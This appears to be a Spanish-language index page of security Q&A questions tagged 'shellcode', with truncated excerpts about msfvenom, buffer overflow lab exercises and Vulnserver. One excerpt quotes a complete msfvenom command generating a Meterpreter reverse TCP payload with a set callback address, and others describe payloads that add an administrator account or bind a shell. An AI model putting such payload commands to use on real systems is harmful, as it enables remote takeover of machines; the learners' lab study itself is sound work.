Preguntas con etiqueta 'shellcode'

preguntas con etiqueta
1
respuesta

msfvenom error de codificación de caracteres incompatibles

Intento crear una carga útil para agregar usuarios al grupo de administradores locales, pero el idioma del servidor es el ruso, por lo que debo agregar mi usuario local al grupo Администраторы. Cuando intento crear una carga útil con el coman...
hecha 09.06.2017 - 16:38
1
respuesta

Fallo de segmentación en shellcode

He generado un código de shell con msfvenom # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=7878 -f c -o shell.c Cuando compilo mi shell.c con gcc (versión 6.3.0-16) con estas opciones: # gcc -o shell shell.c # gcc...
hecha 12.05.2017 - 01:28
1
respuesta

Meterpreter & Vuln Server

Aprendo Shellcode y uso Vulnserver.exe. Logré llegar al punto de inyectar un código de shell como abrir una calculadora o msgbox Pero por alguna razón, enlazar shell en el puerto 4444 no funciona para mí. Aquí está el código fuente: El s...
hecha 14.04.2017 - 20:02
1
respuesta

Problemas con el desbordamiento del búfer de prueba

Estoy experimentando en mi computadora, así que escribí un programa vulnerable en C para probar los desbordamientos de búfer en: #include <stdio.h> #include <string.h> #include <stdlib.h> int check_password(char *password){...
hecha 07.12.2016 - 05:38
1
respuesta

especificador de formato MSFvenom

En msfvenom, ¿qué significa exactamente cuando especifico el formato a C o Python? ¿Y para qué es el formato 'crudo'? Lo sé, cuando el formato es psh-cmd, se ejecuta en el símbolo del sistema, y cuando es exe se ejecuta como un ejecutable normal...
hecha 24.09.2016 - 21:35
1
respuesta

Posible shellcode enviado a mi correo

Cuando abrí mi correo electrónico esta mañana, encontré un mensaje bastante extraño en mi casilla de correo. No parecía el correo electrónico de spam de todos los días, ya que parecía una cadena codificada en base64 y nada más. Aquí hay una capt...
hecha 23.04.2015 - 10:36
1
respuesta

¿Cómo denegar la ejecución del shell en todos los subdirectorios?

Quiero que nginx niegue a los usuarios que tienen carpetas dentro de / webroot / uploads por ejemplo /webroot/uploads/user1 /webroot/uploads/user2 /webroot/uploads/user999 para ejecutar cualquier shell (php, pl, py, binary). Los shell...
hecha 21.01.2014 - 22:34
1
respuesta

Iniciar un nuevo shell en un exploit de strcpy usando un desbordamiento de búfer

Estoy aprendiendo sobre desbordamientos de búfer y tengo este código vulnerable del que estoy intentando iniciar un shell desde: #include <string.h> void myfunction(char *arg); int main(int argc, char **argv) { myfunction(argv[1])...
hecha 26.11.2013 - 23:25
0
respuestas

Fallo de segmentación en el programa de ejercicios

Estoy revisando este video sobre desbordamientos de búfer, pero tengo algunos problemas para replicar la demostración. El problema es que obtengo un error de segmentación cuando espero obtener un shell al final. La idea es que el programa H...
hecha 25.10.2018 - 13:40
0
respuestas

Experimento de desbordamiento de búfer: código de shell ejecutado pero se produjo un error de "no se pudo leer 0 bytes"

He realizado un experimento de desbordamiento de búfer en una máquina virtual Ubuntu 16.04 ( Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux ) y obtuve un error sorprendente...
hecha 30.07.2018 - 01:15